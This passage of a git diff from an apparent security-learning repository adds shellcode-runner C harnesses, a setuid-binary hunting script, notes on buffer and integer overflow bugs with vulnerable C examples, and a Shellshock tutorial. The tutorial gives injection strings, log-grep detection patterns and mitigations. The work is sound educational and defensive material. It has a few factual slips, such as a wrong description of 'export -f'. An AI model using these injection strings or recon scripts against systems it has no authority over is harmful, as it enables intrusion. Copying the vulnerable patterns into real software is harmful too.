if (pid2 > 0) kill(pid2, SIGUSR1);
ret = (*ptr)();
if (sock != -1)
close(sock);
wait(&status);
printf("----------------------\n");
printf("Shellcode returned %d\n", ret);
exit(0);
}

12
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode3.c Normal file
View file

@ -0,0 +1,12 @@
#include <stdio.h> //IO header
#include <string.h> //Functions on favor of strings
#include <stdlib.h> //exit() function
char shellcode[] = ""; /* Global array */
int main(int argc, char **argv)
{
int (*ret)(); /* ret is a func pointer*/
ret = (int(*)())shellcode; /* ret points to our shellcode */
(int)(*ret)(); /* shellcode is type caste as a function */
exit(0); /* exit() */
}

25
Vulnerabilities_and_Exploits/Memory_Exploits/C-codes/testing_shellcode4.c Normal file
View file

@ -0,0 +1,25 @@
/* Sys mman shellcode tester */
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int (*shellcodetotest)();
char shellcode[] = ""; /* Put your shellcode here */
int main(int argc, char **argv)
{
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if(ptr == MAP_FAILED)
{
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
shellcodetotest = ptr;
shellcodetotest();
return 0;
}

2
Vulnerabilities_and_Exploits/Memory_Exploits/Integer_Overflows/integer_overflows.md Normal file
View file

@ -0,0 +1,2 @@
# Integer Overflows

230
Vulnerabilities_and_Exploits/Memory_Exploits/README.md Normal file
View file

@ -0,0 +1,230 @@
# Memory Hacking
## Memory Corruption
Unbounded data copying is bad!
* Lots of APIs:
- strcpy()
- strcat()
- sprintf()
- gets()
#### strcpy
* Memory corruption basic example:
```
int vul_fc(char *userstring)
{
char buf[128];
strcpy(buf, userstring);
/*..*/
}
```
#### strncp and NULL byte
* Better APIs can be not used properly, for eample **strncpy()**, it the parameter to limit lenght is not understood:
```
int vuln_function(char *userstring)
{
char buf[128];
strncp(buf, usertring, strlen(userstring));
/*..*/
}
```
* If the lenght does not account for NULL termination: the amount of data to copy is greater than or equal to size of buf, no NULL byte will be placed:
```
int vuln_function(char *userstring)
{
char buf[128];
strncp(buf, usertring, sizeof(buf));
/*..*/
}
```
* The correct would be **sizeof(buf)-1**.
* C string functions need to have a NULL byte to know where the string ends. Later in the code, it will assume that the string is only as long as the sizeof(buf) when in reality the string is as long as wherefer the next NULL is in memory.
* This could be an adjacent piece of memory the attacker controls, such as another buffer declared on the stack.
#### strncat
* For example string concatenation **strcat()**. This function appends a string from the source buffer to the destination buffer, adding to the end of an existing C strng in dest.
* The size parameter does not account for daa already in the destination buffer:
```
int vuln_function(char *string)
{
char buf1[256];
strncat(buf1, "static data", sizeof(buf1) - 1);
/*..*/
strncat(buf1, string, sizeof(buf1)-1);
}
```
* If there is already data in buf1, it can overwrite beyond the buffer!
#### Wide-characters
* Many misunderstandings with wide-characters such as *wchar_t*.
* Under win32, wchar_t is 16 bits (UTF-16 code unit). On linux, wchar-t is 32 bits (UTF-32).
* Size miscalculation can happen by not considering that sizeof() returns count of 8 bit chars and wchar_t is larger than that:
```
int vul_funcion(char *string1)
{
wchar_t buf1[256];
mbstowcs(buf1, string1, sizeof(buf1)-1);
}
```
* The size lenght is given as sizeof(), however the size argument for mbstowcs() is the count of wide characters to write. Wide characters are bigger than bytes:
```
wchar_t buf1[256];
mbstowcs(buf1, string1, sizeof(buf1)-1);
```
* On Windows, where wchar_t is 16 bits, sizeof(buf) is 512. In the above code, a copy of 511 wide-characters is copied into the destination buffer, when it was intended to be 255.
----
## Data Type Signedness
* Primitive data types (32 bit):
- signed char/unsigned char
- signed short/unsigned short
- signed int/unsigned int
* Redefinitions used for sizes:
- size_t (unsigned)
- size_t (signed)
* By default all data types are signed unless specifically declared otherwise.
* Many functions which accept size arguments take unsigned values.
* char y=-1 has the same bit representation than unsigned char x=255.
* A large value in the unsigned type (highest bit set) is a negative value in the signed type.
* Function **read()** takes only unsigned values for lenght. So if this value is negative, from a if comparison, it will overflow.
* For example, if lenght is **-1** (which is 0xFFFFFFF), when the length check is performed, it is asking if -1 is less than a MAXNUMBER. Then, when the lenght is passed to read, it is converted to unsigned and becomes the unsigned equivalent of -1 (which for 32 bits is 42949672965).
---
## Integer overflow
* Exceeding the amount of data in integer will result in **wrapping**. In the example below, x will be 0:
```
x = 255;
x += 1;
```
* Pointer overflow: pointers are unsigned integers:
```
int StrStuff(int sock, char *buf, size_t buflen)
{
size_t dataSize;
char *maxpoint = buf + buflen;
dataSize = readDataSize(sock);
if (buf + dataSize < maxpoint)
{
read(sock, buf, dataSize);
return 0;
}
return 1;
}
```
### Integer Overflow Exploitation
* In the code below, buf is intend to have enough space +1 to store a NULL byte for a string.
* If the network data supplied is 0xFFFFFFF (max 32 bit value), when 1 is added, it will wrap to 0. This means that the length passed to malloc is zero bytes.
* malloc() will return an under-sized buffer that allows memory corruption in read().
```
int getData(int sock)
{
unsigned int len;
char *buf = NULL;
len = getDataLen(sock);
buf = malloc(len + 1);
read(sock, buf, len);
buf[len+1] = 0x0;
}
```
------------------
## Metacharacter Injection
* In shell: quotes and semi-collon are metacharacters.
* Example, a command to unzip some input file could lead to a second executable command if the input has a **;**:
```
void extractUserZip(char *userFile)
{
char command[1024];
snprintf(command, 1023, "unzip %s", userFile);
system(command);
return;
}
```
----
## Auding Tips
* grep for malloc() and other memory allocation functions.
* look at the data types for size calculation.
* look at values used for size checks: are they signed?
* what happens if negative values are provided.
* look for eval functions such as **system()**.
---------------------------
## Folders
### Assembly
- Shell spawn
----
### Buffer Overflows
- Stack overflow examples
----
### Integer Overflows
---
### Tools
---
### C-codes
- Get env variable

9
Vulnerabilities_and_Exploits/Memory_Exploits/bash/find_setuid_programs.sh Normal file
View file

@ -0,0 +1,9 @@
#Find setuid programs
#!/bin/sh
tempfile="/tmp/$0.$$"
trap "rm $tempfile" 0
find / \( -type f -a -user root -a -perm -4001 \) -print > $tempfile
for file in `cat $tempfile`; do
strings -a $file | awk '/^gets$|^strcpy$|^strcat$|^sprintf$/\
{ printf ("%-10s \t %-50s \n"), $1, file }' "file=$file" -
done

17
Vulnerabilities_and_Exploits/Memory_Exploits/bash/get_shellcode_form_an_exe.sh Normal file
View file

@ -0,0 +1,17 @@
#Get Shellcode form an executable file
#!/bin/bash
if [ $# -ne 1 ]
then
printf "\n\tUsage: $0 filename.o\n\n"
exit
fi
filename=`echo $1 | sed s/"\$"//`
rm -f $filename.shellcode
objdump -d $filename | grep '[0-9a-f]:' |
grep -v 'file' | cut -f2 -d: |
cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' |
sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s |
sed 's/^/"/' | sed 's/$/"/g'
echo

10
Vulnerabilities_and_Exploits/Memory_Exploits/python-codes/eggdis.py Normal file
View file

@ -0,0 +1,10 @@
#! /usr/bin/env python
import sys
from libdisasm import disasm,disasmbuf
dbuf = disasmbuf.DisasmBuffer(sys.stdin.read( ))
d=disasm.LinearDisassembler( )
d.disassemble(dbuf)
for rva,opcode in dbuf.instructions( ):
operands = map(lambda x:"%s %-13s" % (x.access( ),"[%s]" % str(x)),
opcode.operands( ))
print "%08x: %-20s %s" % (rva,str(opcode), "".join(operands))

421
Vulnerabilities_and_Exploits/shellshock.md Normal file
View file

@ -0,0 +1,421 @@
# Understanding the Shellshock Vulnerability
Almost a week ago, a new ([old]) type of [OS command Injection] was reported. The **Shellshock** vulnerability, also known as **[CVE-2014-6271]**, allows attackers to inject their own code into [Bash] using specially crafted **environment variables**, and it was disclosed with the following description:
Bash supports exporting not just shell variables, but also shell functions to other bash instances, via the process environment to(indirect) child processes. Current bash versions use an environment variable named by the function name, and a function definition starting with “() {” in the variable value to propagate function definitions through the environment. The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition.
For example, an environment variable setting of
VAR=() { ignored; }; /bin/id
will execute /bin/id when the environment is imported into the bash process. (The process is in a slightly undefined state at this point. The PATH variable may not have been set up yet, and bash could crash after executing /bin/id, but the damage has already happened at this point.)
The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.
Even scarier, the [NIST vulnerability database] has rated [this vulnerability “10 out of 10” in terms of severity]. At this point, there are claims that the [Shellshock attacks could already top 1 Billion]. [Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!] [Honeypots are catching several exploit payloads]. Matthew Prince, from [Cloudflare], said yesterday that they are "[seeing north of 1.5 million Shellshock attacks across the CloudFlare network daily]". In the same day, the [Incapsula] team released several plots showing that their application firewall had deflected over 217,089 exploit attempts on over 4,115 domains although almost 70% were scanners (to attempt to verify the vulnerability), almost 35% where either payload to try to hijack the server or [DDoS] malware.
[Incapsula]:http://www.incapsula.com/blog/shellshock-bash-vulnerability-aftermath.html,
[DDoS]: http://en.wikipedia.org/wiki/Denial-of-service_attack
[Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!]: http://www.inforisktoday.co.uk/attackers-exploit-shellshock-bug-a-7361
[seeing north of 1.5 million Shellshock attacks across the CloudFlare network daily]: https://twitter.com/eastdakota/status/516457250332741632
[Cloudflare]: https://www.cloudflare.com/
[CVE-2014-6271]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
[old]: http://blog.erratasec.com/2014/09/shellshock-is-20-years-old-get-off-my.html
[OS command Injection]: http://cwe.mitre.org/data/definitions/78.html
[CWE (Common Weakness Enumeration)]: http://cwe.mitre.org/index.html
[Bash]: http://www.gnu.org/software/bash/
[NIST vulnerability database]: http://nvd.nist.gov/
[this vulnerability “10 out of 10” in terms of severity]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
[Honeypots are catching several exploit payloads]: http://www.alienvault.com/open-threat-exchange/blog/attackers-exploiting-shell-shock-cve-2014-6721-in-the-wild
[Shellshock attacks could already top 1 Billion]: http://www.securityweek.com/shellshock-attacks-could-already-top-1-billion-report?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
------------------------------
## Understanding the Bash Shell
To understand this vulnerability, we need to know how Bash handles functions and environment variables.
The [GNU Bourne Again shell (BASH)] is a [Unix shell] and [command language interpreter]. It was released in 1989 by [Brian Fox] for the [GNU Project] as a free software replacement for the [Bourne shell] (which was born back in 1977).
```sh
$ man bash
NAME
bash - GNU Bourne-Again SHell
SYNOPSIS
bash [options] [file]
COPYRIGHT
Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.
DESCRIPTION
Bash is a sh-compatible command language interpreter that executes commands read from the standard input or from a file. Bash also incorporates useful features from the Korn and C shells (ksh and csh).
(...)
```
Of course, there are [other command shells out there]. However, Bash is the default shell for most of the Linux systems (and Linux-based systems), including many Debian-based distributions and the Red Hat & Fedora & CentOS combo.
### Functions in Bash
The interesting stuff comes from the fact that Bash is also a scripting language, with the ability to define functions. This is super useful when you are writing scripts. For example, ```hello.sh```:
```sh
#!/bin/bash
function hello {
echo Hello!
}
hello
```
which can be called as:
```sh
$ chmod a+x hello.sh
$ ./hello.sh
Hello!
```
A function may be compacted into a single line. You just need to choose a name and put a ```()``` after it. Everything inside ```{}``` will belong to the scope of your function.
For example, we can create a function ```bashiscool``` that uses ```echo``` to display message on the standard output:
```sh
$ bashiscool() { echo "Bash is actually Fun"; }
$ bashiscool
Bash is actually Fun
```
### Child Processes and the ```export``` command
We can make things even more interesting. The statement ```bash -c ``` can be used to execute a new instance of Bash, as a subprocess, to run new commands (```-c``` passes a string with a command). The catch is that the child process does not inherit the functions or variables that we defined in the parent:
```sh
$ bash -c bashiscool # spawn nested shell
bash: bashiscool: command not found
```
So before executing a new instance of Bash, we need to export the **environment variables** to the child. That's why we need the ```export``` command. In the example below, the flag ```-f``` means *read key bindings from filename*:
```sh
$ export -f bashiscool
$ bash -c bashiscool # spawn nested shell
Bash is actually Fun
```
In other words, first, the ```export``` command creates a **regular environment variable** containing the function definition. Then, the second shell reads the environment. If it sees a variable that looks like a function, it evaluates this function!
### A Simple Example of an Environment Variable
Let's see how environment variables work examining some *builtin* Bash command. For instance, a very popular one, ```grep```, is used to search for pattern in files (or the standard input).
Running ```grep``` in a file that contains the word 'fun' will return the line where this word is. Running ```grep``` with a flag ```-v``` will return the non-matching lines, *i.e.,* the lines where the word 'fun' does not appear:
```sh
$ echo 'bash can be super fun' > file.txt
$ echo 'bash can be dangerous' >> file.txt
$ cat file.txt
bash can be super fun
bash can be dangerous
$ grep fun file.txt
bash can be super fun
$ grep -v fun file.txt
bash can be dangerous
```
The ```grep``` command uses an environment variable called **GREP_OPTIONS** to set default options. This variable is usually set to:
```sh
$ echo $GREP_OPTIONS
--color=auto
```
To update or create a new environment variable, it is not enough to use the Bash syntax ```GREP_OPTIONS='-v'```, but instead we need to call the *builtin* ```export```:
```sh
$ GREP_OPTIONS='-v'
$ grep fun file.txt
bash can be super fun
$ export GREP_OPTIONS='-v'
$ grep fun file.txt
bash can be dangerous
```
### The ```env``` command
Another Bash *builtin*, the ```env``` prints the environment variables. But it can also be used to run a single command with an exported variable (or variables) given to that command. In this case, ```env``` starts a new process, then it modifies the environment, and then it calls the command that was provided as an argument (the ```env``` process is replaced by the command process).
In practice, to use ```env``` to run commands, we:
1. set the environment variable value with env,
2. spawn a new shell using bash -c,
3. pass the command/function we want to run (for example, grep fun file.txt).
For example:
```sh
$ env GREP_OPTIONS='-v' | grep fun file.txt # this does not work, we need another shell
bash can be super fun
$ env GREP_OPTIONS='-v' bash -c 'grep fun file.txt' # here we go
bash can be dangerous
```
### Facing the Shellshock Vulnerability
What if we pass some function to the variable definition?
```sh
$ env GREP_OPTIONS='() { :;};' bash -c 'grep fun file.txt'
grep: {: No such file or directory
grep: :;};: No such file or directory
grep: fun: No such file or directory
```
Since the things we added are strange when parsed to the command ```grep```, it won't understand them.
What if we add stuff *after* the function? Things start to get weirder:
```sh
$ env GREP_OPTIONS='-v () { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt'
grep: {: No such file or directory
grep: :;};: No such file or directory
grep: echo: No such file or directory
grep: NOOOOOOOOOOOOOOO!: No such file or directory
grep: fun: No such file or directory
file.txt:bash can be super fun
file.txt:bash can be dangerous
```
Did you notice the confusion? *Both* matches and non-matches were printed! It means that some stuff was parsed well! When in doubt, Bash appears to do *everything*?
Now, what if we just keep the function, taking out the only thing that makes sense, ```-v```?
```sh
$ env GREP_OPTIONS='() { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt'
NOOOOOOOOOOOOOOO!
grep: {: No such file or directory
grep: :: No such file or directory
grep: }: No such file or directory
grep: fun: No such file or directory
```
Did you notice that ```echo NOOOOOOOOOOOOOOO!``` was executed normally? **This is the (first) Shellshock bug!**
This works because when the new shell sees an environment variable beginning with ```()```, it gets the variable name and executes the string following it. This includes running anything after the function, *i.e*, the evaluation does not stop when the end of the function definition is reached!
Remember that ```echo``` is not the only thing we can do. The possibilities are unlimited! For example, we can issue any ```/bin``` command:
```sh
$ env GREP_OPTIONS='() { :;}; /bin/ls' bash -c 'grep fun file.txt'
anaconda certificates file.txt IPython
(...)
```
WOW.
Worse, we actually don't need to use a system environment variable nor even call a real command:
```sh
$ env test='() { :;}; echo STILL NOOOOOOOO!!!!' bash -c :
STILL NOOOOOOOO!!!!
```
In the example above, ```env``` runs a command with an arbitrary variable (test) set to some function (in this case is just a single ```:```, a Bash command defined as doing nothing). The semi-colon signals the end of the function definition. Again, the bug is in the fact that there's nothing stopping the parsing of what is after the semi-colon!
Now it's easy to see if your system is vulnerable, all you need to do is run:
```sh
$ env x='() { :;}; echo The system is vulnerable!' bash -c :
```
That simple.
[GNU Bourne Again shell (BASH)]: http://www.gnu.org/software/bash/
[Unix shell]: http://en.wikipedia.org/wiki/Bash_(Unix_shell)
[Brian Fox]: http://en.wikipedia.org/wiki/Brian_Fox_(computer_programmer)
[GNU Project]: http://www.gnu.org/gnu/thegnuproject.html
[Bourne shell]: http://en.wikipedia.org/wiki/Bourne_shell
[command language interpreter]:http://en.wikipedia.org/wiki/Command-line_interface
[other command shells out there]: http://en.wikipedia.org/wiki/Comparison_of_command_shells
----
## There is more than one!
The Shellshock vulnerability is an example of an [arbitrary code execution] (ACE) vulnerability, which is executed on running programs. An attacker will use an ACE vulnerability to run a program that gives her a simple way of controlling the targeted machine. This is nicely achieved by running a Shell such as Bash.
It is not surprising that right after a patch for [CVE-2014-6271] was released, several new issues were opened:
[arbitrary code execution]: http://en.wikipedia.org/wiki/Arbitrary_code_execution
* [CVE-2014-7169]: Right after the first bug was disclosed, a [tweet] from [Tavis Ormandy] showed a *further parser error* that became the second vulnerability:
```sh
$ env X='() { (a)=>\' bash -c "echo vulnerable"; bash -c "echo Bug CVE-2014-7169 patched"
vulnerable
```
* [CVE-2014-7186] and [CVE-2014-7187]: A little after the second bug, two other bugs were found by [Florian Weimer]. One concerning *out of bound memory read error* in [redir_stack] and the other an *off-by-one error in nested loops*. You can check these vulnerabilities in your system [with this script].
* [CVE 2014-6277] and [CVE 2014-6278]: A couple of days ago, these new bugs were found by [Michal Zalewski].
What do you think, is Shellshock [just a blip]?
[just a blip]: http://blog.erratasec.com/2014/09/the-shockingly-bad-code-of-bash.html
[with this script]: https://github.com/hannob/bashcheck
[Florian Weimer]: http://www.enyo.de/fw/
[Michal Zalewski]:http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html
[CVE 2014-6277]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277
[CVE 2014-6278]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
[tweet]: https://twitter.com/taviso/status/514887394294652929
[Tavis Ormandy]: http://taviso.decsystem.org/
[redir_stack]: http://tools.cisco.com/security/center/viewAlert.x?alertId=35860
----
## Suggestions to Protect Your System
Several patches have been released since the Shellshock vulnerabilities were found. Although at this point they [seem to solve most of the problem], below are some recommendations to keep your system safer:
[seem to solve most of the problem]: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
- Update your system! And keep updating it... Many Linux distributions have released new Bash software versions, so follow the instructions of your distribution. In most of the cases, a simple ```yum update``` or ```apt-get update``` or similar will do it. If you have several servers, the script below can be helpful:
```sh
#!/bin/bash
servers=(
120.120.120.120
10.10.10.10
22.22.22.22
)
for server in ${servers[@]}
do
ssh $server 'yum -y update bash'
done
```
- Update firmware on your router or any other web-enabled devices, as soon as they become available. Remember to only download patches from reputable sites (only HTTPS please!), since scammers will likely try to take advantage of Shellshock reports.
- Keep an eye on all of your accounts for signs of unusual activity. Consider changing important passwords.
- HTTP requests to CGI scripts have been identified as the major attack vector. Disable any scripts that call on the shell (however, it does not fully mitigate the vulnerability). To check if your system is vulnerable, you can use [this online scanner]. Consider [mod_security] if you're not already using it.
- Because the HTTP requests used by Shellshock exploits are quite unique, monitor logs with keywords such as ```grep '() {' access_log```or ```cat access_log |grep "{ :;};"```. Some common places for http logs are: ```cPanel: /usr/local/apache/domlogs/```, ```Debian/Apache: /var/log/apache2/```, or ```CentOS: /var/log/httpd/```.
- [Firewall and network filters] can be set to block requests that contain a signature for the attack, *i.e* ```“() {“```.
- If case of an attack, publish the attacker's information! You can use [awk] and [uniq] (where *print $1* means print the first column) to get her IP, for example:
```sh
$ cat log_file |grep "{ :;};" | awk '{print $1}'|uniq
```
- If you are on a managed hosting subscription, check your company's status. For example: [Acquia], [Heroku], [Mediatemple], and [Rackspace].
- Update your Docker containers and AWS instances.
- If you are running production systems that don't need exported functions at all, take a look at [this wrapper] that refuses to run bash if any environment variable's value starts with a left-parent.
[Firewall and network filters]: https://access.redhat.com/articles/1212303
[this wrapper]: https://github.com/dlitz/bash-shellshock
[this online scanner]: http://milankragujevic.com/projects/shellshock/
[mod_security]: https://access.redhat.com/articles/1212303
[CVE-2014-6278]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
[CVE-2014-6277]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277
[CVE-2014-7187]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187
[CVE-2014-7186]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186
[CVE-2014-7169]:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
[CVE-2014-6271]:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
[Acquia]: https://docs.acquia.com/articles/september-2014-gnu-bash-upstream-security-vulnerability
[Rackspace]: https://status.rackspace.com/
[Mediatemple]: http://status.mediatemple.net/
[Heroku]: https://status.heroku.com/incidents/665
[awk]: http://www.grymoire.com/Unix/Awk.html
[uniq]: http://en.wikipedia.org/wiki/Uniq
---
## Further References
#### Reviews
[http://stephane.chazelas.free.fr/](http://stephane.chazelas.free.fr)
[https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack](https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack)
[http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html](http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html)
[http://www.openwall.com/lists/oss-security/2014/09/24/11](http://www.openwall.com/lists/oss-security/2014/09/24/11)
[http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G](http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G)
[http://seclists.org/oss-sec/2014/q3/649](http://seclists.org/oss-sec/2014/q3/649)
[http://www.circl.lu/pub/tr-27/#recommendations](http://www.circl.lu/pub/tr-27/#recommendations)
[http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html](http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html)
[http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html](http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html)
#### Bugs Description
[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025)
[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026)
[http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027](http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027)
[http://blog.cloudflare.com/inside-shellshock/](http://blog.cloudflare.com/inside-shellshock/)
#### Proof-of-Concept Attacks
[https://github.com/mubix/shellshocker-pocs]:https://github.com/mubix/shellshocker-pocs
[http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html](http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html)
[http://www.clevcode.org/cve-2014-6271-shellshock/](http://www.clevcode.org/cve-2014-6271-shellshock/)
[https://www.invisiblethreat.ca/2014/09/cve-2014-6271/](https://www.invisiblethreat.ca/2014/09/cve-2014-6271/)
[http://marc.info/?l=qmail&m=141183309314366&w=2](http://marc.info/?l=qmail&m=141183309314366&w=2)
[https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)
[https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/](https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/)
[https://www.invisiblethreat.ca/2014/09/cve-2014-6271/](https://www.invisiblethreat.ca/2014/09/cve-2014-6271/)
[http://pastebin.com/VyMs3rRd](http://pastebin.com/VyMs3rRd)
[http://infosecnirvana.com/shellshock-hello-honeypot/](http://infosecnirvana.com/shellshock-hello-honeypot/)
[https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725](https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725)